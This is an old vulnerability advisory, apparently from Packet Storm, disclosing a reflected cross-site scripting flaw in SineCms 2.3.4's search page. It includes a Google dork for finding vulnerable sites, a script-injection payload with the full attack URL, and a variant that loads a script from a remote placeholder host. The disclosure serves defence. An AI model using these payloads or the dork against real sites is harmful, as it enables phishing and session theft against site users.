sinecms-xss.txt

2007-05-03T00:00:00
ID PACKETSTORM:56336
Type packetstorm
Reporter Nexus
Modified 2007-05-03T00:00:00

Description

                                        
                                            ` . . .   
._ | _. .|_ _. _.;_/  
[_)|(_]\_|[ )(_](_.| \.net  
| ._|   
"SineCms Version 2.3.4 - Non-Persistent XSS Vulnerability"  
by Nexus  
  
1) Infos  
---------  
Date : 2007-04-26 (ISO 8601)  
Product : SineCms  
Version : 2.3.4 (last), prior versions may also be affected  
Vendor : http://sourceforge.net/projects/sine - http://www.sinecms.net  
Vendor Status : 2007-04-26 - Informed!  
  
Description : SineCms is a management software for international communication   
based on hypertext.  
  
Google Dork : "SineCms Version: 2.3.4"  
  
Source : nexus  
E-mail : nexus[at]playhack[dot]net  
Team : Playhack.net Security  
  
  
2) Security Issues  
-------------------  
The core module for Search engine is affected by a Non-Persistent Cross-Site Scripting  
vulnerability.  
The source in "mods/Core/result.php" doesn't properly sanitize the input of the user  
and just get the submitted text without any previous check on the content.  
The affected variable is $_GET['stringa'], as a matter of fact if we try to insert a  
string like:  
"><script>alert(1);</script>  
The website will retrieve an url like:  
host/path/mods.php?mods=Core&page=result&stringa=%22%3E%3Cscript%3Ealert%281  
%29%3C%2Fscript%3E&campo=all&criterio=tutte&ordine=decrescente  
  
And it executes the JavaScript code.  
The script makes only a check on apex, that can be simply avoided executing for   
example a remote script like  
"><script src=http://host.com/script.js></script>  
  
It's easy to guess that this kind of vulnerability can be used to accomplish some  
Phishing attacks, or whatever can be disfruted from an XSS flaw.  
  
  
3) Patch  
---------  
  
Edit the core source code and sanitize properly the inputted data.  
  
`